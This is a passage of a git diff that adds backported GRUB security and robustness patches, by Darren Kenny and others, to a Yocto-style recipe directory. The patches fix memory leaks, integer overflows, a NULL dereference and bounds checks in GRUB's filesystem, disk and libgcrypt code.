+@@ -199,6 +199,7 @@ make_vg (grub_disk_t disk,
+ {
+ grub_free (vg->uuid);
+ grub_free (vg->name);
++ grub_free (vg);
+ return NULL;
+ }
+ grub_memcpy (vg->uuid, label->group_guid, LDM_GUID_STRLEN);
diff --git a/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
new file mode 100644
index 0000000000..26932f674c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
@@ -0,0 +1,50 @@
+From 3e1d2f1959acbe5152cdd5818d495f6455d1a158 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 10:00:51 +0000
+Subject: [PATCH] disk/ldm: Fix memory leak on uninserted lv references
+
+The problem here is that the memory allocated to the variable lv is not
+yet inserted into the list that is being processed at the label fail2.
+
+As we can already see at line 342, which correctly frees lv before going
+to fail2, we should also be doing that at these earlier jumps to fail2.
+
+Fixes: CID 73824
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=156c281a1625dc73fd350530630c6f2d5673d4f6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 54713f4..e82e989 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -321,7 +321,10 @@ make_vg (grub_disk_t disk,
+ lv->visible = 1;
+ lv->segments = grub_zalloc (sizeof (*lv->segments));
+ if (!lv->segments)
+- goto fail2;
++ {
++ grub_free (lv);
++ goto fail2;
++ }
+ lv->segments->start_extent = 0;
+ lv->segments->type = GRUB_DISKFILTER_MIRROR;
+ lv->segments->node_count = 0;
+@@ -329,7 +332,10 @@ make_vg (grub_disk_t disk,
+ lv->segments->nodes = grub_calloc (lv->segments->node_alloc,
+ sizeof (*lv->segments->nodes));
+ if (!lv->segments->nodes)
+- goto fail2;
++ {
++ grub_free (lv);
++ goto fail2;
++ }
+ ptr = vblk[i].dynamic;
+ if (ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
diff --git a/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..dd7fda357d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
@@ -0,0 +1,50 @@
+From 2550aaa0c23fdf8b6c54e00c6b838f2e3aa81fe2 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 21 Jan 2021 11:38:31 +0000
+Subject: [PATCH] disk/cryptodisk: Fix potential integer overflow
+
+The encrypt and decrypt functions expect a grub_size_t. So, we need to
+ensure that the constant bit shift is using grub_size_t rather than
+unsigned int when it is performing the shift.
+
+Fixes: CID 307788
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a201ad17caa430aa710654fdf2e6ab4c8166f031]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/cryptodisk.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/disk/cryptodisk.c b/grub-core/disk/cryptodisk.c
+index 5037768..6883f48 100644
+--- a/grub-core/disk/cryptodisk.c
++++ b/grub-core/disk/cryptodisk.c
+@@ -311,10 +311,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
+ case GRUB_CRYPTODISK_MODE_CBC:
+ if (do_encrypt)
+ err = grub_crypto_cbc_encrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ else
+ err = grub_crypto_cbc_decrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ if (err)
+ return err;
+ break;
+@@ -322,10 +322,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
+ case GRUB_CRYPTODISK_MODE_PCBC:
+ if (do_encrypt)
+ err = grub_crypto_pcbc_encrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ else
+ err = grub_crypto_pcbc_decrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ if (err)
+ return err;
+ break;
diff --git a/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
new file mode 100644
index 0000000000..eb459c547f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
@@ -0,0 +1,43 @@
+From 7c1813eeec78892fa651046cc224ae4e80d0c94d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 23 Oct 2020 17:09:31 +0000
+Subject: [PATCH] hfsplus: Check that the volume name length is valid
+
+HFS+ documentation suggests that the maximum filename and volume name is
+255 Unicode characters in length.
+
+So, when converting from big-endian to little-endian, we should ensure
+that the name of the volume has a length that is between 0 and 255,
+inclusive.
+
+Fixes: CID 73641
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2298f6e0d951251bb9ca97d891d1bc8b74515f8c]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/hfsplus.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/grub-core/fs/hfsplus.c b/grub-core/fs/hfsplus.c
+index dae43be..03c3c4c 100644
+--- a/grub-core/fs/hfsplus.c
++++ b/grub-core/fs/hfsplus.c
+@@ -1007,6 +1007,15 @@ grub_hfsplus_label (grub_device_t device, char **label)
+ grub_hfsplus_btree_recptr (&data->catalog_tree, node, ptr);
+
+ label_len = grub_be_to_cpu16 (catkey->namelen);
++
++ /* Ensure that the length is >= 0. */
++ if (label_len < 0)
++ label_len = 0;
++
++ /* Ensure label length is at most 255 Unicode characters. */
++ if (label_len > 255)
++ label_len = 255;
++
+ label_name = grub_calloc (label_len, sizeof (*label_name));
+ if (!label_name)
+ {
diff --git a/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
new file mode 100644
index 0000000000..12418858f9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
@@ -0,0 +1,42 @@
+From c757779e5d09719666c3b155afd2421978a107bd Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 24 Nov 2020 16:41:49 +0000
+Subject: [PATCH] zfs: Fix possible negative shift operation
+
+While it is possible for the return value from zfs_log2() to be zero
+(0), it is quite unlikely, given that the previous assignment to blksz
+is shifted up by SPA_MINBLOCKSHIFT (9) before 9 is subtracted at the
+assignment to epbs.
+
+But, while unlikely during a normal operation, it may be that a carefully
+crafted ZFS filesystem could result in a zero (0) value to the
+dn_datalbkszsec field, which means that the shift left does nothing
+and assigns zero (0) to blksz, resulting in a negative epbs value.
+
+Fixes: CID 73608
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a02091834d3e167320d8a262ff04b8e83c5e616d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 36d0373..0c42cba 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -2667,6 +2667,11 @@ dnode_get (dnode_end_t * mdn, grub_uint64_t objnum, grub_uint8_t type,
+ blksz = grub_zfs_to_cpu16 (mdn->dn.dn_datablkszsec,
+ mdn->endian) << SPA_MINBLOCKSHIFT;
+ epbs = zfs_log2 (blksz) - DNODE_SHIFT;
++
++ /* While this should never happen, we should check that epbs is not negative. */
++ if (epbs < 0)
++ epbs = 0;
++
+ blkid = objnum >> epbs;
+ idx = objnum & ((1 << epbs) - 1);
+
diff --git a/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
new file mode 100644
index 0000000000..5ded5520e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
@@ -0,0 +1,121 @@
+From 83fdffc07ec4586b375ab36189f255ffbd8f99c2 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 14 Dec 2020 18:54:49 -0300
+Subject: [PATCH] zfs: Fix resource leaks while constructing path
+
+There are several exit points in dnode_get_path() that are causing possible
+memory leaks.
+
+In the while(1) the correct exit mechanism should not be to do a direct return,
+but to instead break out of the loop, setting err first if it is not already set.
+
+The reason behind this is that the dnode_path is a linked list, and while doing
+through this loop, it is being allocated and built up - the only way to
+correctly unravel it is to traverse it, which is what is being done at the end
+of the function outside of the loop.
+
+Several of the existing exit points correctly did a break, but not all so this
+change makes that more consistent and should resolve the leaking of memory as
+found by Coverity.
+
+Fixes: CID 73741
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=89bdab965805e8d54d7f75349024e1a11cbe2eb8]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 30 +++++++++++++++++++++---------
+ 1 file changed, 21 insertions(+), 9 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 0c42cba..9087a72 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -2836,8 +2836,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+
+ if (dnode_path->dn.dn.dn_type != DMU_OT_DIRECTORY_CONTENTS)
+ {
+- grub_free (path_buf);
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
++ err = grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
++ break;
+ }
+ err = zap_lookup (&(dnode_path->dn), cname, &objnum,
+ data, subvol->case_insensitive);
+@@ -2879,11 +2879,18 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ << SPA_MINBLOCKSHIFT);
+
+ if (blksz == 0)
+- return grub_error(GRUB_ERR_BAD_FS, "0-sized block");
++ {
++ err = grub_error (GRUB_ERR_BAD_FS, "0-sized block");
++ break;
++ }
+
+ sym_value = grub_malloc (sym_sz);
+ if (!sym_value)
+- return grub_errno;
++ {
++ err = grub_errno;
++ break;
++ }
++
+ for (block = 0; block < (sym_sz + blksz - 1) / blksz; block++)
+ {
+ void *t;
+@@ -2893,7 +2900,7 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ if (err)
+ {
+ grub_free (sym_value);
+- return err;
++ break;
+ }
+
+ movesize = sym_sz - block * blksz;
+@@ -2903,6 +2910,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ grub_memcpy (sym_value + block * blksz, t, movesize);
+ grub_free (t);
+ }
++ if (err)
++ break;
+ free_symval = 1;
+ }
+ path = path_buf = grub_malloc (sym_sz + grub_strlen (oldpath) + 1);
+@@ -2911,7 +2920,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ grub_free (oldpathbuf);
+ if (free_symval)
+ grub_free (sym_value);
+- return grub_errno;
++ err = grub_errno;
++ break;
+ }
+ grub_memcpy (path, sym_value, sym_sz);
+ if (free_symval)
+@@ -2949,11 +2959,12 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+
+ err = zio_read (bp, dnode_path->dn.endian, &sahdrp, NULL, data);
+ if (err)
+- return err;
++ break;
+ }
+ else
+ {
+- return grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
++ err = grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
++ break;
+ }
+
+ hdrsize = SA_HDR_SIZE (((sa_hdr_phys_t *) sahdrp));
+@@ -2974,7 +2985,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ if (!path_buf)
+ {
+ grub_free (oldpathbuf);
+- return grub_errno;
++ err = grub_errno;
++ break;
+ }
+ grub_memcpy (path, sym_value, sym_sz);
+ path [sym_sz] = 0;
diff --git a/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
new file mode 100644
index 0000000000..8df758b41f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
@@ -0,0 +1,56 @@
+From ec35d862f3567671048aa0d0d8ad1ded1fd25336 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 22:17:04 +0000
+Subject: [PATCH] zfs: Fix possible integer overflows
+
+In all cases the problem is that the value being acted upon by
+a left-shift is a 32-bit number which is then being used in the
+context of a 64-bit number.
+
+To avoid overflow we ensure that the number being shifted is 64-bit
+before the shift is done.
+
+Fixes: CID 73684, CID 73695, CID 73764
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=302c12ff5714bc455949117c1c9548ccb324d55b]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 9087a72..b078ccc 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -564,7 +564,7 @@ find_bestub (uberblock_phys_t * ub_array,
+ ubptr = (uberblock_phys_t *) ((grub_properly_aligned_t *) ub_array
+ + ((i << ub_shift)
+ / sizeof (grub_properly_aligned_t)));
+- err = uberblock_verify (ubptr, offset, 1 << ub_shift);
++ err = uberblock_verify (ubptr, offset, (grub_size_t) 1 << ub_shift);
+ if (err)
+ {
+ grub_errno = GRUB_ERR_NONE;
+@@ -1543,7 +1543,7 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
+
+ high = grub_divmod64 ((offset >> desc->ashift) + c,
+ desc->n_children, &devn);
+- csize = bsize << desc->ashift;
++ csize = (grub_size_t) bsize << desc->ashift;
+ if (csize > len)
+ csize = len;
+
+@@ -1635,8 +1635,8 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
+
+ while (len > 0)
+ {
+- grub_size_t csize;
+- csize = ((s / (desc->n_children - desc->nparity))
++ grub_size_t csize = s;
++ csize = ((csize / (desc->n_children - desc->nparity))
+ << desc->ashift);
+ if (csize > len)
+ csize = len;
diff --git a/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
new file mode 100644
index 0000000000..555dc19168
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
@@ -0,0 +1,35 @@
+From b085da8efda9b81f94aa197ee045226563554fdf Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 10:56:45 +0000
+Subject: [PATCH] zfsinfo: Correct a check for error allocating memory
+
+While arguably the check for grub_errno is correct, we should really be
+checking the return value from the function since it is always possible
+that grub_errno was set elsewhere, making this code behave incorrectly.
+
+Fixes: CID 73668
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7aab03418ec6a9b991aa44416cb2585aff4e7972]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfsinfo.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfsinfo.c b/grub-core/fs/zfs/zfsinfo.c
+index c8a28ac..bf29180 100644
+--- a/grub-core/fs/zfs/zfsinfo.c
++++ b/grub-core/fs/zfs/zfsinfo.c
+@@ -358,8 +358,8 @@ grub_cmd_zfs_bootfs (grub_command_t cmd __attribute__ ((unused)), int argc,
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("one argument expected"));
+
+ devname = grub_file_get_device_name (args[0]);
+- if (grub_errno)
+- return grub_errno;
++ if (devname == NULL)
++ return GRUB_ERR_OUT_OF_MEMORY;
+
+ dev = grub_device_open (devname);
+ grub_free (devname);
diff --git a/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
new file mode 100644
index 0000000000..435130516c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
@@ -0,0 +1,82 @@
+From 929c2ce8214c53cb95abff57a89556cd18444097 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 12:48:07 +0000
+Subject: [PATCH] affs: Fix memory leaks
+
+The node structure reference is being allocated but not freed if it
+reaches the end of the function. If any of the hooks had returned
+a non-zero value, then node would have been copied in to the context
+reference, but otherwise node is not stored and should be freed.
+
+Similarly, the call to grub_affs_create_node() replaces the allocated
+memory in node with a newly allocated structure, leaking the existing
+memory pointed by node.
+
+Finally, when dir->parent is set, then we again replace node with newly
+allocated memory, which seems unnecessary when we copy in the values
+from dir->parent immediately after.
+
+Fixes: CID 73759
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=178ac5107389f8e5b32489d743d6824a5ebf342a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/affs.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/grub-core/fs/affs.c b/grub-core/fs/affs.c
+index 220b371..230e26a 100644
+--- a/grub-core/fs/affs.c
++++ b/grub-core/fs/affs.c
+@@ -400,12 +400,12 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+ {
+ unsigned int i;
+ struct grub_affs_file file;
+- struct grub_fshelp_node *node = 0;
++ struct grub_fshelp_node *node, *orig_node;
+ struct grub_affs_data *data = dir->data;
+ grub_uint32_t *hashtable;
+
+ /* Create the directory entries for `.' and `..'. */
+- node = grub_zalloc (sizeof (*node));
++ node = orig_node = grub_zalloc (sizeof (*node));
+ if (!node)
+ return 1;
+
+@@ -414,9 +414,6 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+ return 1;
+ if (dir->parent)
+ {
+- node = grub_zalloc (sizeof (*node));
+- if (!node)
+- return 1;
+ *node = *dir->parent;
+ if (hook ("..", GRUB_FSHELP_DIR, node, hook_data))
+ return 1;
+@@ -456,17 +453,18 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+
+ if (grub_affs_create_node (dir, hook, hook_data, &node, &hashtable,
+ next, &file))
+- return 1;
++ {
++ /* Node has been replaced in function. */
++ grub_free (orig_node);
++ return 1;
++ }
+
+ next = grub_be_to_cpu32 (file.next);
+ }
+ }
+
+- grub_free (hashtable);
+- return 0;
+-
+ fail:
+- grub_free (node);
++ grub_free (orig_node);
+ grub_free (hashtable);
+ return 0;
+ }
diff --git a/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
new file mode 100644
index 0000000000..f500f1a296
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
@@ -0,0 +1,36 @@
+From 9b16d7bcad1c7fea7f26eb2fb3af1a5ca70ba34e Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 3 Nov 2020 16:43:37 +0000
+Subject: [PATCH] libgcrypt/mpi: Fix possible unintended sign extension
+
+The array of unsigned char gets promoted to a signed 32-bit int before
+it is finally promoted to a size_t. There is the possibility that this
+may result in the signed-bit being set for the intermediate signed
+32-bit int. We should ensure that the promotion is to the correct type
+before we bitwise-OR the values.
+
+Fixes: CID 96697
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e8814c811132a70f9b55418f7567378a34ad3883]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+
+---
+ grub-core/lib/libgcrypt/mpi/mpicoder.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+index a3435ed..7ecad27 100644
+--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
++++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+@@ -458,7 +458,7 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
+ if (len && len < 4)
+ return gcry_error (GPG_ERR_TOO_SHORT);
+
+- n = (s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3]);
++ n = ((size_t)s[0] << 24 | (size_t)s[1] << 16 | (size_t)s[2] << 8 | (size_t)s[3]);
+ s += 4;
+ if (len)
+ len -= 4;
diff --git a/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
new file mode 100644
index 0000000000..08299d021e
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
@@ -0,0 +1,33 @@
+From d26c8771293637b0465f2cb67d97cb58bacc62da Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 10:41:54 +0000
+Subject: [PATCH] libgcrypt/mpi: Fix possible NULL dereference
+
+The code in gcry_mpi_scan() assumes that buffer is not NULL, but there
+is no explicit check for that, so we add one.
+
+Fixes: CID 73757
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ae0f3fabeba7b393113d5dc185b6aff9b728136d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/libgcrypt/mpi/mpicoder.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+index 7ecad27..6fe3891 100644
+--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
++++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+@@ -379,6 +379,9 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
+ unsigned int len;
+ int secure = (buffer && gcry_is_secure (buffer));
+
++ if (!buffer)
++ return gcry_error (GPG_ERR_INV_ARG);
++
+ if (format == GCRYMPI_FMT_SSH)
+ len = 0;
+ else
diff --git a/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
new file mode 100644
index 0000000000..d8c21d88f7
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
@@ -0,0 +1,43 @@
+From ea12feb69b6af93c7e2fa03df7ac3bd1f4edd599 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 15:31:53 +0000
+Subject: [PATCH] syslinux: Fix memory leak while parsing
+
+In syslinux_parse_real() the 2 points where return is being called
+didn't release the memory stored in buf which is no longer required.
+
+Fixes: CID 176634
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=95bc016dba94cab3d398dd74160665915cd08ad6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/syslinux_parse.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/syslinux_parse.c b/grub-core/lib/syslinux_parse.c
+index 4afa992..3acc6b4 100644
+--- a/grub-core/lib/syslinux_parse.c
++++ b/grub-core/lib/syslinux_parse.c
+@@ -737,7 +737,10 @@ syslinux_parse_real (struct syslinux_menu *menu)
+ && grub_strncasecmp ("help", ptr3, ptr4 - ptr3) == 0))
+ {
+ if (helptext (ptr5, file, menu))
+- return 1;
++ {
++ grub_free (buf);
++ return 1;
++ }
+ continue;
+ }
+
+@@ -757,6 +760,7 @@ syslinux_parse_real (struct syslinux_menu *menu)
+ }
+ fail:
+ grub_file_close (file);
++ grub_free (buf);
+ return err;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
new file mode 100644
index 0000000000..8a26e5bc5b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
@@ -0,0 +1,52 @@
+From 2367049d2021e00d82d19cee923e06a4b04ebc30 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 18:56:48 +0000
+Subject: [PATCH] normal/completion: Fix leaking of memory when processing a
+ completion
+
+It is possible for the code to reach the end of the function without
+freeing the memory allocated to argv and argc still to be 0.
+
+We should always call grub_free(argv). The grub_free() will handle
+a NULL argument correctly if it reaches that code without the memory
+being allocated.
+
+Fixes: CID 96672
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9213575b7a95b514bce80be5964a28d407d7d56d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/normal/completion.c | 10 ++++------
+ 1 file changed, 4 insertions(+), 6 deletions(-)
+
+diff --git a/grub-core/normal/completion.c b/grub-core/normal/completion.c
+index 5961028..46e473c 100644
+--- a/grub-core/normal/completion.c
++++ b/grub-core/normal/completion.c
+@@ -400,8 +400,8 @@ char *
+ grub_normal_do_completion (char *buf, int *restore,
+ void (*hook) (const char *, grub_completion_type_t, int))
+ {
+- int argc;
+- char **argv;
++ int argc = 0;
++ char **argv = NULL;
+
+ /* Initialize variables. */
+ match = 0;
+@@ -516,10 +516,8 @@ grub_normal_do_completion (char *buf, int *restore,
+
+ fail:
+ if (argc != 0)
+- {
+- grub_free (argv[0]);
+- grub_free (argv);
+- }
++ grub_free (argv[0]);
++ grub_free (argv);
+ grub_free (match);
+ grub_errno = GRUB_ERR_NONE;
+
diff --git a/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
new file mode 100644
index 0000000000..e34a19e12c
--- /dev/null
